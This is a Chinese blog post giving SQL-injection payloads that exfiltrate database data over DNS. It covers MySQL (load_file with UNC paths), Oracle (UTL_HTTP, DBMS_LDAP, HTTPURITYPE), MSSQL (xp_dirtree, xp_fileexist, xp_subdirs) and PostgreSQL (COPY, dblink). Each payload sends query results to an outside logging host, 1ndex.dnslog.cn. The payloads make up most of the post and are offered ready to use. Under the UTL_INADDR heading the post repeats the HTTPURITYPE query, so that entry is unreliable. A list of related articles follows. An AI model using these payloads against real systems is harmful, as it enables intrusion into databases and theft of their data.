mysql dns注入_SQL 注入-DNS 外带数据

最新推荐文章于 2024-05-29 14:50:04 发布
最新推荐文章于 2024-05-29 14:50:04 发布
阅读量284 收藏
点赞数
文章标签: mysql dns注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35123047/article/details/113906868
版权

参考文章

注:外带数据皆为数据库版本信息

mysql

条件:

Windows

mysql.ini 中 secure_file_priv 必须为空,select @@secure_file_priv

适用于联合注入或堆叠注入

具体:

利用 mysql (Windows 适用)中的 load_file() 函数

select load_file(concat("\\\\",version(),".1ndex.dnslog.cn//1ndex.txt"));

当查询的数据中有特殊符号时,可使用 hex() 函数外带

select load_file(concat("\\\\",hex(version()),".1ndex.dnslog.cn//1ndex.txt"));,数据过长不行

oracle

条件:适用于联合注入或堆叠注入

可用函数:

UTL_HTTP.REQUEST()

SELECT UTL_HTTP.REQUEST((SELECT * from v$version)||'.1ndex.dnslog.cn') FROM sys.DUAL;

DBMS_LDAP.INIT()

SELECT DBMS_LDAP.INIT((SELECT * from v$version)||'.1ndex.dnslog.cn',80) FROM sys.DUAL;

HTTPURITYPE()

SELECT HTTPURITYPE((SELECT * from v$version)||'.1ndex.dnslog.cn').GETCLOB() FROM sys.DUAL;

UTL_INADDR.GET_HOST_ADDRESS()

SELECT HTTPURITYPE((SELECT * from v$version)||'.1ndex.dnslog.cn').GETCLOB() FROM sys.DUAL;

mssql

条件:Windows、适用于堆叠注入

id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT SERVERPROPERTY('edition'))%2b'.1ndex.dnslog.cn'; EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');

id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT SERVERPROPERTY('edition'))%2b'.1ndex.dnslog.cn'; EXEC('master..xp_fileexist "\'%2b@host%2b'\foobar$"');

id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT SERVERPROPERTY('edition'))%2b'.1ndex.dnslog.cn'; EXEC('master..xp_subdirs "\'%2b@host%2b'\foobar$"');

postgreSQL

条件:Windows、适用于堆叠注入

id=1;DROP TABLE IF EXISTS table_output; CREATE TABLE table_output(content text); CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT; DECLARE query_result TEXT; BEGIN SELECT INTO query_result (select version()); exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.1ndex.dnslog.cn\\\\aaa.txt\''; EXECUTE exec_cmd; END; $$ LANGUAGE plpgSQL SECURITY DEFINER; SELECT temp_function();

开启 db_link 扩展:

id=1;CREATE EXTENSION dblink;SELECT * FROM dblink('host='||(SELECT version())||'.1ndex.dnslog.cn username=1ndex password=1ndex','SELECT 1ndex') RETURNS (result TEXT);

注意点

dns 查询有长度限制,所以当查询结果数据过长时需要截断

特殊符号,如@,一般先编码后再带出

千1100
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql dns 注入_数据DNSLog外带注入-总结
weixin_29279047的博客
01-19 943
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
DNS外带注入
lml_0916的博客
08-06 631
选择高级,在高级中的服务器选项中有一个禁用递归,如果是勾上的一定要取消,因为服务器就是需要递归来进行转发的,如果勾上了也转发不了了。添加主机之后就创建完成了,然后把win11的虚拟机的dns服务修改为刚刚配置的服务器的ip地址。然后勾选DNS服务器,(因为我安装了一个,所以这个我选的别的进行的演示。然后跳出弹唱就直接选择下一步,就可以,然后默认它的选项选择主要区域,然后点击下一步。填写主机名称和IP,名称就写的是ns,IP地址为你sqlmap所在虚机的ip地址。然后建立一个区域名称,这里就随便写就可以了。.
dns外带数据【渗透测试】
热门推荐
leeezp的博客
09-09 32万+
上一篇文章我们已经介绍了搭建自己的dns log server 方法,接下来我将介绍如何通过dns query外带数据。下文中介绍的方法均为根据本人经验原创的方法,网上应该算是首次公开。
MySQL注入Dns 注入
最新发布
baimaozi008的博客
05-29 1013
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
DNSlog注入 信息的 带外|外带 sql注入利用详解+实操
weixin_48083470的博客
08-04 3691
DNSlog注入 DNSlog注入原理 dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度 首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性 s
DNSlog外带原理及注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
10-sql注入-mysql注入1
08-03
当应用程序将用户提供的数据直接拼接到SQL查询中而不进行适当验证时,就可能发生SQL注入。攻击者可以通过构造特定的输入,使SQL查询执行非预期的操作,如读取、修改或删除敏感数据,甚至获取数据库服务器的完全控制...
MySQL 面试题-SQL注入篇.docx
09-17
SQL注入是一种严重的网络安全威胁,尤其针对使用MySQL数据库系统的Web应用程序。攻击者通过在用户输入的数据中插入恶意SQL代码,可以操控数据库,获取敏感信息,甚至破坏整个系统。以下是关于SQL注入的详细解释和...
MySQL解决SQL注入的另类方法详解
09-10
SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句来获取、修改、删除数据库中的数据,甚至控制系统。在MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要...
SQL.rar_labview mysql_mysql labview_sql
09-21
标题“SQL.rar_labview mysql_mysql labview_sql”和描述“在labview中实现数据MySQL调用的节点函数”指向一个关于使用LabVIEW(Laboratory Virtual Instrument Engineering Workbench)与MySQL数据库进行交互的...
SQL手工注入完全篇
09-08
SQL手工注入完全篇
PHP+Mysql 带SQL注入源码 下载
04-25
SQL注入是指攻击者通过输入恶意的SQL语句,来操纵数据库,获取、修改、删除敏感数据,甚至完全控制数据库服务器。例如,一个简单的用户登录表单,如果未对用户输入进行充分的验证和转义,攻击者可以构造特定的输入,...
【sql注入dns带外通信实践】
qq_40646572的博客
05-29 903
带外通信技术,通常使用在无法直接利用漏洞获得回显的,但目标确实存在漏洞的情况下使用,通过DNS请求就可以把想获得的数据外带出来。 带外通信使用在sql注入的条件如下: 部分文章介绍带外通信时,提及需要设置 secure_auth=ON并且secure_file_priv=’‘。但我在环境实现时发现,只需要设置下secure_file_priv=’‘即可,当然可能时因为版本的问题。我使用的mysql版本如下: 使用的dnslog是用的ceye平台的,自己个人资料中的标识符中的地址就是dns回显地址。 h
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 1907
创新蓝队-针对DNSlog数据外带攻击的应急与预防
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 762
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
17、注入篇--DNS注入MySQL
WX公众号-小白学安全
04-10 850
DNS注入 DNS注入也称DNS带外注入DNSLog注入 DNSDNS(Domain Name System)域名系统,将域名与IP地址相互映射的一个分布式数据DNS注入核心是 将盲注变为显错注入 DNS-log ​ DNS服务器的解析记录 注入基础 1、load_file() 读取文件的函数 ​ 读取文件并返回文件内容为字符串 ​ 要使用此函数文件必须位于主服务器上,必须指定完整路径的文件,而且必须有file权限 ​ 该文件所有字节可读,但文件内容必须小于max_allower_packe
sqlmap + dnslog外带数据
CYLK1987310466的博客
08-06 1017
sqlmap dnslog外带数据
mysqldump -u root -p company t_dept > d:\t_dept_back.sql mysqldump -u root -p --databases company companynew> d:\database_company_back.sql mysql -uroot -p company <d:\t_Dept_back.sql mysql -uroot -p <d:\database_company_back.sql mysql -u root –p1234 -e "SELECT * FROM t_dept" company> d:/t_dept1.txt mysqlimport -u root -p1234 company d:\t_dept.txt每行代码有什么用
06-12
- `mysql -uroot -p <d:\database_company_back.sql`:将 `d:\database_company_back.sql` 中备份的 `company` 和 `companynew` 两个数据库的数据恢复到 MySQL 数据库中。 - `mysql -u root –p1234 -e "SELECT * ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值